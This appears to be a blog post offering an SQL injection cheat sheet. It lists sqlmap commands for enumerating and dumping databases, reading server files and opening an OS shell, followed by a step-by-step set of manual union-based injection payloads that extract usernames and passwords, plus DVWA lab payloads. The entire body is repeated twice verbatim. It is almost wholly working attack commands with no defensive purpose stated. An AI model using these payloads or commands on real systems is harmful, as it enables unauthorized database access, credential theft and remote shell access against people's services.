SQLMAP and Manual SQLi Command
A-SQLMAP Command-
Get Database-
sqlmap.py -u "website" --dbs --batch
Get Tables-
sqlmap.py -u "website" --tables -D acuart
Get Columns-
sqlmap.py -u "website" --columns -T users -D acuart
Dump Columns-
sqlmap.py -u "website" -D acuart -T users -C (put column name (a,b,c,d)) --dump
Safe SQL Map-
sqlmap.py -r 1.txt --force-ssl --level=1 --risk=1 --threads=1 --dbms="Postgresql" --technique=BEUSTQ
Dump All in One-
sqlmap.py -u "website" -D acuart --dump-all
B-Manual SQLi Command-
Check for SQLi-
1-http://Target-IP/1.php?format1=json&token1=123456789'
{"status":401, dta":"No Data found with this provided token"}
Fixing the Query-
1- http://Target-IP/1.php?format1=json&token1=123456789'+or'1'='1--+
{"status":200}
Getting the no of column with Order By-
2-http://Target-IP/1.php?format1=json&token1=123456789'+order+by+10--+
Getting the vulnerable column-
5-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,2,3,4,5,6,7,8,9,10--+
Getting the DB Version-
6-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,@@version,3,4,5,6,7,8,9,10--+
Getting Table Names-
7-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables--+
Getting user Table-
8-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--+
Getting the Column Names-
9-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='user'+and+table_schema=database()--+
Getting User Names and Password from users table-
10-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+user--+
**********************
SQLMap-
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=12345678 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u http://<IP> --dbms=mysql --crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" –forms
sqlmap check form for injection
sqlmap -o -u "http://xyz/vuln-form" --forms -D database-name -T users –dump
sqlmap dump and crack hashes for table users on database-name.
sqlmap --flush session
Flushes the session
sqlmap -p user --technique=B
Attempts to exploit the “user” field using boolean technique.
sqlmap -r <captured request>
Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add –os-shell at the end to pop a shell if possible.
DVWA-
use --+ or # or ; foe comment. char(117,115,101,114,115)# user table 1. ?id=1' order by 1,2# 2. ?id=1' union select 1,2# 3. ?id=1' union select database(),version()# 4. ?id=1' union select 1,table_name from information_schema.tables# 5. ?id=1' union select 1,column_name from information_schema.columns where table_name=char(117,115,101,114,115)# 6. ?id=1' union select user,password from users#
Get Database-
sqlmap.py -u "website" --dbs --batch
Get Tables-
sqlmap.py -u "website" --tables -D acuart
Get Columns-
sqlmap.py -u "website" --columns -T users -D acuart
Dump Columns-
sqlmap.py -u "website" -D acuart -T users -C (put column name (a,b,c,d)) --dump
Safe SQL Map-
sqlmap.py -r 1.txt --force-ssl --level=1 --risk=1 --threads=1 --dbms="Postgresql" --technique=BEUSTQ
Dump All in One-
sqlmap.py -u "website" -D acuart --dump-all
B-Manual SQLi Command-
Check for SQLi-
1-http://Target-IP/1.php?format1=json&token1=123456789'
{"status":401, dta":"No Data found with this provided token"}
Fixing the Query-
1- http://Target-IP/1.php?format1=json&token1=123456789'+or'1'='1--+
{"status":200}
Getting the no of column with Order By-
2-http://Target-IP/1.php?format1=json&token1=123456789'+order+by+10--+
Getting the vulnerable column-
5-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,2,3,4,5,6,7,8,9,10--+
Getting the DB Version-
6-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,@@version,3,4,5,6,7,8,9,10--+
Getting Table Names-
7-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables--+
Getting user Table-
8-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--+
Getting the Column Names-
9-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name='user'+and+table_schema=database()--+
Getting User Names and Password from users table-
10-http://Target-IP/1.php?format1=json&token1=123456789'+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+user--+
**********************
SQLMap-
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=12345678 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u http://<IP> --dbms=mysql --crawl=3
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump Scan url for union + error based injection with mysql backend and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" –forms
sqlmap check form for injection
sqlmap -o -u "http://xyz/vuln-form" --forms -D database-name -T users –dump
sqlmap dump and crack hashes for table users on database-name.
sqlmap --flush session
Flushes the session
sqlmap -p user --technique=B
Attempts to exploit the “user” field using boolean technique.
sqlmap -r <captured request>
Capture a request via Burp Suite, save it to a file, and use this command to let sqlmap automate everything. Add –os-shell at the end to pop a shell if possible.
DVWA-
use --+ or # or ; foe comment. char(117,115,101,114,115)# user table 1. ?id=1' order by 1,2# 2. ?id=1' union select 1,2# 3. ?id=1' union select database(),version()# 4. ?id=1' union select 1,table_name from information_schema.tables# 5. ?id=1' union select 1,column_name from information_schema.columns where table_name=char(117,115,101,114,115)# 6. ?id=1' union select user,password from users#
Comments
Post a Comment